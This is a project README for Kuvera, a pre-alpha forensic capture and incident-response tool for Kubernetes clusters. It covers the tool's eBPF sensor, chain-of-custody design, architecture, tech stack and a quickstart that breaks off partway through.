Jacklevi02/Kuvera-DFIR

# Kuvera [](https://opensource.org/licenses/Apache-2.0) [](#) ## What Kuvera does When a container in your Kubernetes cluster is compromised, you have seconds — not hours — before the evidence vanishes. Containers die. Pods reschedule. Nodes autoscale away. Kuvera is an always-on forensic flight recorder for Kubernetes. It runs an eBPF sensor on every node that continuously captures process, file, and network events. When you (or an automated detection) trigger a forensic capture against a pod, Kuvera freezes the container, snapshots its state, packages every piece of evidence with a cryptographic chain of custody, and gives you a unified timeline of exactly what happened. It is built for incident responders, SOC analysts, and DFIR consultants who need court-admissible evidence from cloud-native environments. ## Core capabilities - **Always-on eBPF sensor** — continuous, low-overhead capture of syscalls, file access, and network events, scoped to containers - **One-command capture** — `kubectl create -f capture.yaml` to trigger evidence collection on a target pod - **Chain of custody** — every artifact SHA-256 hashed, signed, and recorded in an append-only transparency log - **Unified timeline** — kernel events, container events, Kubernetes audit logs, and cloud audit logs merged into a single investigator view - **Self-managed** — runs entirely inside your cluster; your evidence never leaves your environment - **Pluggable analyzers** — extend with custom YARA rules, Volatility plugins, or IOC feeds ## Status Pre-alpha. Active early development. Not production-ready. ## Architecture ┌─────────────────────────────────────────────────────────────────┐ │ Kubernetes Cluster │ │ │ │ ┌────────────┐ ┌────────────┐ ┌────────────┐ │ │ │ Node 1 │ │ Node 2 │ │ Node N │ │ │ │ ┌────────┐ │ │ ┌────────┐ │ │ ┌────────┐ │ │ │ │ │ Sensor │ │ │ │ Sensor │ │ │ │ Sensor │ │ DaemonSet │ │ │ │ (eBPF) │ │ │ │ (eBPF) │ │ │ │ (eBPF) │ │ (Go) │ │ │ └────┬───┘ │ │ └────┬───┘ │ │ └────┬───┘ │ │ │ └──────┼─────┘ └──────┼─────┘ └──────┼─────┘ │ │ │ │ │ │ │ └────────────────┴────────────────┘ │ │ │ │ │ NATS JetStream │ │ │ │ │ ┌────────────────┼────────────────┐ │ │ │ │ │ │ │ ┌────▼─────┐ ┌─────▼──────┐ ┌────▼──────┐ │ │ │ Operator │ │ Analyzer │ │ Console │ │ │ │ (Go) │ │ Workers │ │ API (Go) │ │ │ │ │ │ (Python) │ │ │ │ │ └────┬─────┘ └─────┬──────┘ └────┬──────┘ │ │ │ │ │ │ │ └────────────────┼────────────────┘ │ │ │ │ │ ┌───────────┼───────────┐ │ │ │ │ │ │ │ ┌────▼───┐ ┌────▼───┐ ┌────▼─────┐ │ │ │ MinIO │ │Postgres│ │OpenSearch│ │ │ │(blobs) │ │(meta) │ │(timeline)│ │ │ └────────┘ └────────┘ └──────────┘ │ └─────────────────────────────────────────────────────────────────┘ │ ▼ ┌──────────────┐ │ Web Console │ │ (TypeScript) │ └──────────────┘ ## Tech stack - **Sensor:** Go + `cilium/ebpf` - **Operator:** Go + Kubebuilder - **API gateway:** Go (gRPC + REST) - **Analyzer workers:** Python (Volatility3, YARA, custom) - **Console:** TypeScript, React, Vite, shadcn/ui, TanStack Query - **Storage:** MinIO (blobs), PostgreSQL + TimescaleDB (metadata), OpenSearch (search) - **Messaging:** NATS JetStream - **Deployment:** Helm ## Quickstart (target experience) # Install Kuvera into your cluster helm install kuvera oci://ghcr.io/kuvera/charts/kuvera \ --namespace kuvera-system --create-namespace # Verify the sensor DaemonSet is running on every node kubectl get ds -n kuvera-system # Trigger a forensic capture on a suspicious pod cat <